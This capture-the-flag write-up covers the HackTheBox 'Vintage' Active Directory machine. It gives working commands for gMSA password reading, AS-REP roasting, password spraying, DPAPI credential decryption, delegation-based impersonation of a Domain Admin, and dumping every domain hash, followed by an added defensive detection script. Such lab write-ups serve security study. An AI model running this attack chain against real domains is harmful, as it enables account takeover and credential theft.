HTB-Vintage

Box Info

Difficulty: Hard
OS: Windows
IP Address: 10.10.11.45
Credentials: P.Rosa : Rosaisbest123

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.45 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.45 -sCV -Pn -sT -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,53972,62290
# Nmap scan vulnerability
sudo nmap -sT -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,53972,62290 --script=vuln -O -Pn 10.10.11.45
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.45

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-29 15:16:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
53972/tcp open msrpc Microsoft Windows RPC
62290/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.45 vintage.htb dc01.vintage.htb

Service Enumeration

389/tcp - LDAP

Since credentials were provided, let's use them to query LDAP.

ldapsearch -x -H ldap://10.10.11.45 -D 'vintage\P.Rosa' -w 'Rosaisbest123' -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName memberOf

Output of the ldapsearch:

# extended LDIF
#
# LDAPv3
# base <DC=vintage,DC=htb> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName memberOf
#

# Administrator, Users, vintage.htb
dn: CN=Administrator,CN=Users,DC=vintage,DC=htb
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=vintage,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: Administrator

# Guest, Users, vintage.htb
dn: CN=Guest,CN=Users,DC=vintage,DC=htb
memberOf: CN=Guests,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: Guest

# DC01, Domain Controllers, vintage.htb
dn: CN=DC01,OU=Domain Controllers,DC=vintage,DC=htb
sAMAccountName: DC01$

# krbtgt, Users, vintage.htb
dn: CN=krbtgt,CN=Users,DC=vintage,DC=htb
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=vintage,DC=htb
sAMAccountName: krbtgt

# gMSA01, Managed Service Accounts, vintage.htb
dn: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
sAMAccountName: gMSA01$

# fs01, Computers, vintage.htb
dn: CN=fs01,CN=Computers,DC=vintage,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: FS01$

# M.Rossi, Users, vintage.htb
dn: CN=M.Rossi,CN=Users,DC=vintage,DC=htb
sAMAccountName: M.Rossi

# R.Verdi, Users, vintage.htb
dn: CN=R.Verdi,CN=Users,DC=vintage,DC=htb
sAMAccountName: R.Verdi

# L.Bianchi, Users, vintage.htb
dn: CN=L.Bianchi,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: L.Bianchi

# G.Viola, Users, vintage.htb
dn: CN=G.Viola,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: G.Viola

# C.Neri, Users, vintage.htb
dn: CN=C.Neri,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: C.Neri

# P.Rosa, Users, vintage.htb
dn: CN=P.Rosa,CN=Users,DC=vintage,DC=htb
sAMAccountName: P.Rosa

# svc_sql, Pre-Migration, vintage.htb
dn: CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_sql

# svc_ldap, Pre-Migration, vintage.htb
dn: CN=svc_ldap,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_ldap

# svc_ark, Pre-Migration, vintage.htb
dn: CN=svc_ark,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_ark

# C.Neri_adm, Users, vintage.htb
dn: CN=C.Neri_adm,CN=Users,DC=vintage,DC=htb
memberOf: CN=DelegatedAdmins,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Desktop Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: C.Neri_adm

# L.Bianchi_adm, Users, vintage.htb
dn: CN=L.Bianchi_adm,CN=Users,DC=vintage,DC=htb
memberOf: CN=DelegatedAdmins,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=vintage,DC=htb
sAMAccountName: L.Bianchi_adm

# search reference
ref: ldap://ForestDnsZones.vintage.htb/DC=ForestDnsZones,DC=vintage,DC=htb

# search reference
ref: ldap://DomainDnsZones.vintage.htb/DC=DomainDnsZones,DC=vintage,DC=htb

# search reference
ref: ldap://vintage.htb/CN=Configuration,DC=vintage,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 21
# numEntries: 17
# numReferences: 3

The LDAP output also lists a computer account named FS01 (FS01.vintage.htb), so let's add it to /etc/hosts as well.

Bloodhound

For DNS resolution of the domain to work properly, we need to point our Kali resolver at the domain controller.

sudo nano /etc/resolv.conf
nameserver 10.10.11.45

Now we can collect data with bloodhound-python.

sudo ntpdate 10.10.11.45 && bloodhound-python -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All --zip -dc dc01.vintage.htb

After collection, start BloodHound.

sudo neo4j start
bloodhound


The L.BIANCHI_ADM user is a member of Domain Admins.


The C.NERI_ADM user can RDP into DC01.


The GMSA01$@VINTAGE.HTB account has GenericWrite and AddSelf permissions on the ServiceManagers group.


The FS01 computer is a member of Domain Computers, and that group has ReadGMSAPassword rights on GMSA01$.

Initiate User Foothold

Obtain gMSA01$

Use impacket-getTGT to obtain a TGT in ccache format for the FS01$ computer account.

sudo ntpdate 10.10.11.45 && impacket-getTGT -dc-ip 10.10.11.45 vintage.htb/FS01$:fs01


export KRB5CCNAME=FS01\$.ccache

Then use bloodyAD to read the GMSA01$ managed service account password, which is stored in the msDS-ManagedPassword attribute.

bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178
msDS-ManagedPassword.B64ENCODED: cAPhluwn4ijHTUTo7liDUp19VWhIi9/YDwdTpCWVnKNzxHWm2Hl39sN8YUq3hoDfBcLp6S6QcJOnXZ426tWrk0ztluGpZlr3eWU9i6Uwgkaxkvb1ebvy6afUR+mRvtftwY1Vnr5IBKQyLT6ne3BEfEXR5P5iBy2z8brRd3lBHsDrKHNsM+Yd/OOlHS/e1gMiDkEKqZ4dyEakGx5TYviQxGH52ltp1KqT+Ls862fRRlEzwN03oCzkLYg24jvJW/2eK0aXceMgol7J4sFBY0/zAPwEJUg1PZsaqV43xWUrVl79xfcSbyeYKL0e8bKhdxNzdxPlsBcLbFmrdRdlKvE3WQ==

Now we can use the gMSA account's NTLM hash to obtain a Kerberos TGT for GMSA01$.

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/GMSA01$ -hashes aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178


export KRB5CCNAME=GMSA01\$.ccache

Then, using the GMSA01$ ccache, add P.Rosa to the SERVICEMANAGERS group, and request a fresh P.Rosa ticket.

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"


sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb 

export KRB5CCNAME=P.Rosa.ccache


As a member of the SERVICEMANAGERS group, P.Rosa can now enumerate all the users.

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > users.txt


Then use impacket-GetNPUsers to list the users that don't require Kerberos pre-authentication (UF_DONT_REQUIRE_PREAUTH).

sudo ntpdate 10.10.11.45 && impacket-GetNPUsers -dc-ip 10.10.11.45 -request -usersfile users.txt vintage.htb/


Disable PREAUTH

After listing the users that don't require Kerberos pre-authentication, we can use bloodyAD to set the DONT_REQ_PREAUTH flag on the service users.

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH


Remove the ACCOUNTDISABLE flag from the service users.

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE


Now let's run GetNPUsers against those AD users again.

sudo ntpdate 10.10.11.45 && impacket-GetNPUsers -dc-ip 10.10.11.45 -request -usersfile users.txt vintage.htb/


We obtained AS-REP hashes for all three service users.

$krb5asrep$23$svc_sql@VINTAGE.HTB:30fe580fde4cc8d859e66a0b633862ba$2a15c602b497013f8e4d445a711eceaadb5998c5b249411d3166ccea91ad5c37a91f26eace6a9f4f12009fa2712e959c68d8900185b0e07d3bd2df432497540874a4cbc5f1c4076b24c1652f6f7e8a294c0841614c3555a98a3cce78471c49c56aa607c01452c1e15d6f4034d32e7b15e4beff9d0a96eecc60d4a3d42109ce669c8bdc67d389df73e3e307f9a568b1904d74c14d617507edf0b5890b7dd03c0df8a87f3f1224a36be363b07e89f153b43815bdc18f34632859237aaa018b3231db461e6f77db0981f8a20819dc26684f1b231c2549b90ee8b0adb58fc59c2a19da122066a0209a60645d
$krb5asrep$23$svc_ldap@VINTAGE.HTB:ce3e6d591ee069ee4f84269d506e6495$294cae39538b0050bec15f7418342e3e0294e016ec3e61b96fc7d49034223b0cb12b70fc363998d9e1f949882511cd351ea322b8455d34496e5dc10dd322a626d30fc78d7908cc03c8705db7374459b6026a818b37db6681aabdfac970b5ba3735626eafe6eb7b033eb37dc04aea85b92f51580c614375d0b41a883ab5eb0cbaa91d8b1594315bdf9c2e6574f7f4871cd3abddf78afaaf09ec37422540aa2011fc1beb85ebe1b9c9049c433238be4525870102edc77f1eec5eaf64a170b2713a12dafe514a76272ee80708ca4ebeb0f6b782f1e8466c41b8fae9ad15d848af42e748dad671fd1ba32c69
$krb5asrep$23$svc_ark@VINTAGE.HTB:b1de691c95efac71e594b2981fa65887$8f21ce52b9457b693199d63e23b85ef2a1141c3d5e226384cec3ad5508d97209c30288e445980da0fbe05f12f0cf694e711eb1f87586df59a2483a6360b19400e14bff1abf06ae5afb6b33bf31ca038e48cf180ed34ba4ed318be4affe7a68792d0715f5cf82c9bb16f35c5bd5808a6c7a20971a9142f05439c9f2bc29b2fc471e712e78c85a48c7694168e013e4370ee37049dbfe906c2b2c1f5b49d66692c380be604a56481ad3c16c7d88f63ae711269be7b80a42a05886b86b5cc103c8a0e9cf9dc2fb8b5244219823575dea2d23b699a4961c0073d6ef60e979a9826aa419c81c83fb1b633cae2c

Crack the Kerberos AS-REP hash

hashcat -m 18200 svc_sql.hash /usr/share/wordlists/rockyou.txt


Here we obtained the password of the svc_sql service user.

svc_sql : Zer0the0ne

Kerbrute Password Spray

https://github.com/ropnop/kerbrute

With the password obtained, let's use Kerbrute to spray it against the user list.

sudo ntpdate 10.10.11.45 && ./kerbrute --dc vintage.htb -d vintage.htb -v passwordspray ../HTB/Season6/Vintage/users.txt Zer0the0ne


The results show that 2 logins were successful.

svc_sql@vintage.htb : Zer0the0ne
C.Neri@vintage.htb : Zer0the0ne


WinRM C.NERI

Before proceeding to WinRM, we need to obtain a Kerberos ticket (TGT) for the c.neri user.

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
export KRB5CCNAME=c.neri.ccache
klist


Update /etc/krb5.conf

https://gist.github.com/zhsh9/f1ba951ec1eb3de401707bbbec407b98

We found a script that configures krb5.conf easily.

python3 configure_krb5.py vintage.htb dc01
[libdefaults]
default_realm = VINTAGE.HTB
dns_lookup_kdc = true
dns_lookup_realm = false
ticket_lifetime = 24h
forwardable = true

[realms]
VINTAGE.HTB = {
kdc = dc01.vintage.htb
admin_server = dc01.vintage.htb
default_domain = vintage.htb
}

[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB

Now we can access WinRM.

sudo ntpdate -s 10.10.11.45 && evil-winrm -i dc01.vintage.htb -u C.Neri -r vintage.htb


User Flag


Privilege Escalation

OS Explore


There is antivirus running on the host, which makes exploitation hard; after checking writeups, we found we can start from DPAPI.

DPAPI

DPAPI secrets | The Hacker Recipes

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords).

We can abuse DPAPI to recover data stored in the user's profile directory, which is protected by user-specific master keys derived from the user's password.

cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
dir -h
download C4BB96844A5C9DD45D5B6A9859252BA6


cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
dir -h
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b


Decrypt the DPAPI

Decrypt Masterkey

impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne


We now have the decrypted master key, which can be used to decrypt the credential file.

Decrypt Credentials

impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a


Here we obtained the c.neri_adm credentials

c.neri_adm : Uncr4ck4bl3P4ssW0rd0312

Bloodhound from C.Neri_adm

sudo ntpdate 10.10.11.45 && bloodhound-python -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -d vintage.htb -c All --zip -ns 10.10.11.45


Initiate Root Foothold

DELEGATEDADMINS Group

Add the svc_sql user into DELEGATEDADMINS group

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb --dc-ip 10.10.11.45 -d "VINTAGE.HTB" -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k add groupMember "DELEGATEDADMINS" "SVC_SQL"

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
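As an added example (not from the original writeup), here is a defender-side check over two directory snapshots that flags the changes made in the Disable PREAUTH steps above (DONT_REQ_PREAUTH set, ACCOUNTDISABLE cleared) and the group additions to SERVICEMANAGERS and DELEGATEDADMINS. The snapshots are constructed from the box's account and group names; the userAccountControl bit values are the standard Windows ones, while the snapshot layout and the watched-group list are assumptions of this example.

```python
# Added example (not from the original writeup): diff two snapshots of
# userAccountControl and memberOf and report the changes this attack chain
# makes. Snapshot contents are constructed from the box's account names.
ACCOUNTDISABLE = 0x0002      # standard userAccountControl bit
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Groups whose membership changes deserve review (names taken from the box).
WATCHED_GROUPS = {"ServiceManagers", "DelegatedAdmins", "Domain Admins"}

SVC_ACCTS_DN = "CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb"
SVC_MGRS_DN = "CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb"
DELEG_DN = "CN=DelegatedAdmins,OU=Pre-Migration,DC=vintage,DC=htb"

# Constructed "before" snapshot: service accounts disabled, P.Rosa in no groups.
BEFORE = {
    "P.Rosa": {"uac": NORMAL_ACCOUNT, "memberOf": []},
    "C.Neri": {"uac": NORMAL_ACCOUNT, "memberOf": [SVC_MGRS_DN]},
    "svc_sql": {"uac": NORMAL_ACCOUNT | ACCOUNTDISABLE, "memberOf": [SVC_ACCTS_DN]},
    "svc_ldap": {"uac": NORMAL_ACCOUNT | ACCOUNTDISABLE, "memberOf": [SVC_ACCTS_DN]},
    "svc_ark": {"uac": NORMAL_ACCOUNT | ACCOUNTDISABLE, "memberOf": [SVC_ACCTS_DN]},
}
# Constructed "after" snapshot: the state the bloodyAD commands leave behind.
AFTER = {
    "P.Rosa": {"uac": NORMAL_ACCOUNT, "memberOf": [SVC_MGRS_DN]},
    "C.Neri": {"uac": NORMAL_ACCOUNT, "memberOf": [SVC_MGRS_DN]},
    "svc_sql": {"uac": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
                "memberOf": [SVC_ACCTS_DN, DELEG_DN]},
    "svc_ldap": {"uac": NORMAL_ACCOUNT | DONT_REQ_PREAUTH, "memberOf": [SVC_ACCTS_DN]},
    "svc_ark": {"uac": NORMAL_ACCOUNT | DONT_REQ_PREAUTH, "memberOf": [SVC_ACCTS_DN]},
}


def _cn(dn: str) -> str:
    """Leading RDN value of a DN: 'CN=DelegatedAdmins,OU=...' -> 'DelegatedAdmins'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def audit(before: dict, after: dict) -> list:
    """Return (sAMAccountName, finding) pairs for risky transitions."""
    findings = []
    for sam, new in after.items():
        old = before.get(sam, {"uac": 0, "memberOf": []})
        gained = new["uac"] & ~old["uac"]   # bits newly set
        lost = old["uac"] & ~new["uac"]     # bits newly cleared
        if gained & DONT_REQ_PREAUTH:
            findings.append((sam, "DONT_REQ_PREAUTH_SET"))     # now AS-REP roastable
        if lost & ACCOUNTDISABLE:
            findings.append((sam, "ACCOUNTDISABLE_CLEARED"))   # dormant account revived
        for dn in sorted(set(new["memberOf"]) - set(old["memberOf"])):
            if _cn(dn) in WATCHED_GROUPS:
                findings.append((sam, "ADDED_TO:" + _cn(dn)))
    return findings


if __name__ == "__main__":
    for sam, what in audit(BEFORE, AFTER):
        print(f"{sam:10} {what}")
```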


Troubleshoot

Remove ACCOUNTDISABLE attribute from svc_sql user

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" -u 'C.Neri' -p Zer0the0ne -k --dc-ip 10.10.11.45 remove uac svc_sql -f ACCOUNTDISABLE

Then obtain a TGT for svc_sql.

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/svc_sql:Zer0the0ne -dc-ip dc01.vintage.htb

export KRB5CCNAME=svc_sql.ccache


Impersonate L.BIANCHI_ADM

Now that svc_sql has been added to DELEGATEDADMINS, we can request a service ticket for cifs/dc01.vintage.htb impersonating the L.BIANCHI_ADM user.

sudo ntpdate 10.10.11.45 && impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'


Add svc_sql to the DELEGATEDADMINS group and obtain the L.BIANCHI_ADM ticket quickly, one right after the other.

sudo ntpdate 10.10.11.45 && impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'

Once obtained, export to KRB5CCNAME and use wmiexec to access

export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
sudo ntpdate 10.10.11.45 && impacket-wmiexec -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb

Root Flag


LSA Hash

Dumping Domain Controller Hashes Locally and Remotely | Red Team Notes

sudo ntpdate 10.10.11.45 && impacket-secretsdump -just-dc-ntlm -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::